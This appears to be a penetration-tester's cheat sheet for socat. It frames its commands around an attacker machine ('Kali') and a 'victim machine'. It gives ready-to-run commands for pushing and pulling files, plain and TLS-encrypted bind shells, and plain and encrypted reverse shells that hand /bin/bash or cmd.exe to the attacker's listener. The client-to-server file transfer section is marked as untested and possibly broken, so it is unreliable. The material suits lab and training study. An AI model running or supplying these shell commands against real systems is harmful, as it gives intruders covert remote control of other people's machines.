Socat is a command line based utility that establishes two bidirectional byte streams and transfers data between them. Similar to Netcat but supports encryption.
socat -h
socat -hh
socat -hhh
man socat
Client Mode
Connect to a TCP port
socat - TCP4:$IP:$PORT

There is no feedback.

For interacting with a specific service, see Ports & Protocols
Server Mode (listen)

Use sudo for port numbers < 1024
sudo socat TCP4-LISTEN:443 STDOUT
File Transfer
Transfer file – From Server to Client
Server mode (e.g. Kali)
Anyone who connects to this port will receive the file.
sudo socat TCP4-LISTEN:443,fork file:~/
Client mode (e.g. victim machine)
socat TCP4:$IP:443,create
Transfer file – From Client to Server

Tentative, to validate 😉 Says connection refused but file was created.
Server mode (e.g. Kali)
sudo socat TCP4-LISTEN:443 file:~/,create
Client mode (e.g. victim machine)
socat TCP4:$IP:443,fork file:~/,create
Bind Shell
Client –> Bind shell –> Server
Server mode (Victim)
sudo socat TCP4-LISTEN:443,fork EXEC:/bin/bash # Linux
socat TCP4-LISTEN:443,fork EXEC:cmd.exe,pipes # Windows
Client mode (Kali)
socat - TCP4:$IP:443
Encrypted Bind Shell
Server mode (Victim)
# Generate certificate for encryption, if applicable
openssl req -newkey rsa:2048 -nodes -keyout socat.key -x509 -days 362 -out socat.crt
cat socat.key socat.crt > socat.pem
sudo socat OPENSSL-LISTEN:443,cert=socat.pem,verify=0,fork EXEC:/bin/bash # Linux
socat OPENSSL-LISTEN:443,cert=socat.pem,verify=0,fork EXEC:cmd.exe,pipes # Windows
Client mode (Kali)
socat - OPENSSL:$IP:443,verify=0
Reverse Shell
Send a command shell to a host listening on a port.
Server mode (Kali)
-d -d: verbose
sudo socat -d -d TCP4-LISTEN:443 STDOUT
Client mode (Victim sends reverse shell to Kali)
socat TCP4:$IP:443 EXEC:/bin/bash # Linux
socat TCP4:$IP:443 EXEC:cmd.exe,pipes # Windows

If netcat is not available on victim’s machine, use other reverse shells. Also see the reverse shell cheat sheet from HighOnCoffee.
Encrypted Reverse Shell
Server mode (Kali)
# Generate certificate for encryption, if applicable
openssl req -newkey rsa:2048 -nodes -keyout socat.key -x509 -days 362 -out socat.crt
cat socat.key socat.crt > socat.pem
sudo socat -d -d OPENSSL-LISTEN:443,cert=socat.pem,verify=0 STDOUT
Client mode (Victim sends reverse shell to Kali)
socat OPENSSL:$IP:443,verify=0 EXEC:/bin/bash # Linux
socat OPENSSL:$IP:443,verify=0 EXEC:cmd.exe,pipes # Windows